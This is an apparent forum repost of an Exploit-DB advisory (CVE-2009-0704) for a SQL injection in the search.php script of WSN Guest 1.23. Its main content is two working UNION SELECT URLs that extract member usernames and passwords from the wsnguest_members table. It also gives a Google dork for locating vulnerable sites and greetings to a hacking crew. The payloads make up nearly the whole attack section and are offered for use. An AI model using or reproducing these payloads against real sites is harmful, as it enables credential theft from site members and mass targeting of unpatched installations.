Exploit WSN Guest 1.23 - 'Search' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7659
Проверка EDB
  1. Пройдено
Автор
DAIMON
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-0704
Дата публикации
2009-01-04
Код:
WSN Guest 1.23 (search.php) SQL Injection Vulnerability
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Author    : DaiMon
Homepage  : http://www.cwdaimon.com
Contact   : cwdaimon[at]gmail.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Script       : WSN Guest
 
Last version : 1.23
Download     : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###########################
Google Dork:
allinurl:wsnguest
###########################
Exploat  :

Username :
          [path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/name%20text,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
Password :
          [path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/password,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
###########################
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###########################
Special : PARS! , Equilibrium , alpican , Cem , BlackFear , ALL Cyber-Warrior
###########################

# milw0rm.com [2009-01-04]
 
Источник
www.exploit-db.com

Похожие темы